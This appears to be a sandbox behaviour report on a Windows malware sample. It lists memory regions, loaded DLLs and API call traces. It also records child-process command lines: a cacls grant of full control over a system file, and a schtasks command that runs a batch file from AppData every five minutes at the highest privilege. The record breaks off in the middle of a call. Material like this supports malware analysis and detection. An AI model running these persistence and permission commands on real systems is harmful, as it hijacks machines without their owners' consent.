= mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8182 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8183 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8184 start_va = 0x51b0000 end_va = 0x53dffff entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 8185 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8186 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8187 start_va = 0x4ec0000 end_va = 0x4ecffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ec0000" filename = "" Region: id = 8188 start_va = 0x7e720000 end_va = 0x7e81ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e720000" filename = "" Region: id = 8251 start_va = 0x4fc0000 end_va = 0x507dfff entry_point = 0x4fc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8252 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8253 start_va = 0x5080000 end_va = 0x50bffff entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 8254 start_va = 0x50c0000 end_va = 0x50fffff entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 8255 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 8256 start_va = 0x7e848000 end_va = 0x7e84afff entry_point = 0x0 region_type = private name = "private_0x000000007e848000" filename = "" Region: id = 8257 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 8258 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8259 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8260 start_va = 0x4ed0000 end_va = 0x4ed3fff entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 8261 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8262 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8263 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8264 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 8265 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 8266 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 8267 start_va = 0x53e0000 end_va = 0x55cffff entry_point = 0x0 region_type = private name = "private_0x00000000053e0000" filename = "" Region: id = 8268 start_va = 0x5100000 end_va = 0x5129fff entry_point = 0x5100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8269 start_va = 0x53e0000 end_va = 0x5567fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000053e0000" filename = "" Region: id = 8270 start_va = 0x55c0000 end_va = 0x55cffff entry_point = 0x0 region_type = private name = "private_0x00000000055c0000" filename = "" Region: id = 8271 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8272 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 8273 start_va = 0x4ee0000 end_va = 0x4ee4fff entry_point = 0x4ee0000 region_type = mapped_file name = "takeown.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\takeown.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\takeown.exe.mui") Region: id = 8274 start_va = 0x55d0000 end_va = 0x5750fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000055d0000" filename = "" Region: id = 8275 start_va = 0x5760000 end_va = 0x6b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005760000" filename = "" Region: id = 8276 start_va = 0x5100000 end_va = 0x5100fff entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 8277 start_va = 0x5110000 end_va = 0x5110fff entry_point = 0x0 region_type = private name = "private_0x0000000005110000" filename = "" Region: id = 8279 start_va = 0x6b60000 end_va = 0x6e96fff entry_point = 0x6b60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8280 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8281 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Thread: id = 918 os_tid = 0x3d0 Thread: id = 921 os_tid = 0xde0 Process: id = "114" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x543e000" os_pid = "0xdf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "109" os_parent_pid = "0xdfc" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\" /E /G CIiHmnxMn6Ps:F /C" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8190 start_va = 0x6f0000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 8191 start_va = 0x710000 end_va = 0x711fff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 8192 start_va = 0x720000 end_va = 0x733fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 8193 start_va = 0x740000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 8194 start_va = 0x780000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 8195 start_va = 0x7c0000 end_va = 0x7c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 8196 start_va = 0xd70000 end_va = 0xd79fff entry_point = 0xd70000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 8197 start_va = 0xd80000 end_va = 0x4d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 8198 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8199 start_va = 0x7ef20000 end_va = 0x7ef42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef20000" filename = "" Region: id = 8200 start_va = 0x7ef45000 end_va = 0x7ef45fff entry_point = 0x0 region_type = private name = "private_0x000000007ef45000" filename = "" Region: id = 8201 start_va = 0x7ef4c000 end_va = 0x7ef4efff entry_point = 0x0 region_type = private name = "private_0x000000007ef4c000" filename = "" Region: id = 8202 start_va = 0x7ef4f000 end_va = 0x7ef4ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef4f000" filename = "" Region: id = 8203 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8204 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8205 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 8206 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8207 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 8208 start_va = 0x7d0000 end_va = 0x7d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 8209 start_va = 0x7e0000 end_va = 0x7e1fff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 8223 start_va = 0x900000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 8224 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8225 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8226 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8227 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8228 start_va = 0x910000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 8229 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8230 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8231 start_va = 0x6f0000 end_va = 0x6fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 8232 start_va = 0x7ee20000 end_va = 0x7ef1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee20000" filename = "" Region: id = 8282 start_va = 0x7f0000 end_va = 0x8adfff entry_point = 0x7f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8283 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8284 start_va = 0x8b0000 end_va = 0x8effff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 8285 start_va = 0x910000 end_va = 0x94ffff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 8286 start_va = 0xa70000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 8287 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8288 start_va = 0x7ef49000 end_va = 0x7ef4bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef49000" filename = "" Region: id = 8289 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8290 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8291 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8292 start_va = 0x700000 end_va = 0x703fff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 8293 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8294 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8295 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 8296 start_va = 0xb70000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 8297 start_va = 0x710000 end_va = 0x713fff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 8299 start_va = 0x4d80000 end_va = 0x50b6fff entry_point = 0x4d80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8300 start_va = 0x8f0000 end_va = 0x8f1fff entry_point = 0x8f0000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Thread: id = 919 os_tid = 0xbf0 Thread: id = 923 os_tid = 0xdf8 Process: id = "115" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x15105000" os_pid = "0xdf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0xe2c" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C schtasks /Create /tn DSHCA /tr \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat\" /sc minute /mo 5 /RL HIGHEST /F" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8303 start_va = 0x30000 end_va = 0x4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8304 start_va = 0x50000 end_va = 0x51fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 8305 start_va = 0x60000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 8306 start_va = 0x80000 end_va = 0xbffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 8307 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 8308 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 8309 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 8310 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8311 start_va = 0x7eff0000 end_va = 0x7f012fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eff0000" filename = "" Region: id = 8312 start_va = 0x7f013000 end_va = 0x7f013fff entry_point = 0x0 region_type = private name = "private_0x000000007f013000" filename = "" Region: id = 8313 start_va = 0x7f01a000 end_va = 0x7f01cfff entry_point = 0x0 region_type = private name = "private_0x000000007f01a000" filename = "" Region: id = 8314 start_va = 0x7f01d000 end_va = 0x7f01dfff entry_point = 0x0 region_type = private name = "private_0x000000007f01d000" filename = "" Region: id = 8315 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8316 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8317 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 8318 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8319 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 8320 start_va = 0x1c0000 end_va = 0x1c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 8321 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 8322 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 8323 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 8324 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8325 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8326 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8327 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8328 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 8329 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8330 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8331 start_va = 0x30000 end_va = 0x3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8332 start_va = 0x7eef0000 end_va = 0x7efeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eef0000" filename = "" Region: id = 8537 start_va = 0x1f0000 end_va = 0x2adfff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8538 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8539 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 8540 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8541 start_va = 0x500000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 8542 start_va = 0x7f017000 end_va = 0x7f019fff entry_point = 0x0 region_type = private name = "private_0x000000007f017000" filename = "" Region: id = 8543 start_va = 0x40000 end_va = 0x43fff entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 8629 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 8661 start_va = 0x690000 end_va = 0x9c6fff entry_point = 0x690000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 924 os_tid = 0xb34 [0284.282] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0284.282] __set_app_type (_Type=0x1) [0284.282] __p__fmode () returned 0x77984d6c [0284.282] __p__commode () returned 0x77985b1c [0284.282] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0284.282] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0284.282] GetCurrentThreadId () returned 0xb34 [0284.282] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb34) returned 0x84 [0284.282] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0284.282] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0284.282] SetThreadUILanguage (LangId=0x0) returned 0x409 [0284.287] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0284.287] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bfb20 | out: phkResult=0x1bfb20*=0x0) returned 0x2 [0284.287] VirtualQuery (in: lpAddress=0x1bfb27, lpBuffer=0x1bfad8, dwLength=0x1c | out: lpBuffer=0x1bfad8*(BaseAddress=0x1bf000, AllocationBase=0xc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0284.287] VirtualQuery (in: lpAddress=0xc0000, lpBuffer=0x1bfad8, dwLength=0x1c | out: lpBuffer=0x1bfad8*(BaseAddress=0xc0000, AllocationBase=0xc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0284.287] VirtualQuery (in: lpAddress=0xc1000, lpBuffer=0x1bfad8, dwLength=0x1c | out: lpBuffer=0x1bfad8*(BaseAddress=0xc1000, AllocationBase=0xc0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0284.287] VirtualQuery (in: lpAddress=0xc3000, lpBuffer=0x1bfad8, dwLength=0x1c | out: lpBuffer=0x1bfad8*(BaseAddress=0xc3000, AllocationBase=0xc0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0284.287] VirtualQuery (in: lpAddress=0x1c0000, lpBuffer=0x1bfad8, dwLength=0x1c | out: lpBuffer=0x1bfad8*(BaseAddress=0x1c0000, AllocationBase=0x1c0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0284.287] GetConsoleOutputCP () returned 0x1b5 [0284.324] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0284.325] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0284.325] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.325] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0284.767] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.767] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0284.868] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.868] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0284.924] _get_osfhandle (_FileHandle=0) returned 0x38 [0284.924] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0284.957] _get_osfhandle (_FileHandle=0) returned 0x38 [0284.957] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0284.962] GetEnvironmentStringsW () returned 0x2c7f90* [0284.962] FreeEnvironmentStringsA (penv="=") returned 1 [0284.962] GetEnvironmentStringsW () returned 0x2c7f90* [0284.962] FreeEnvironmentStringsA (penv="=") returned 1 [0284.962] RegOpenKeyExW (in: hKey=0x80000002, 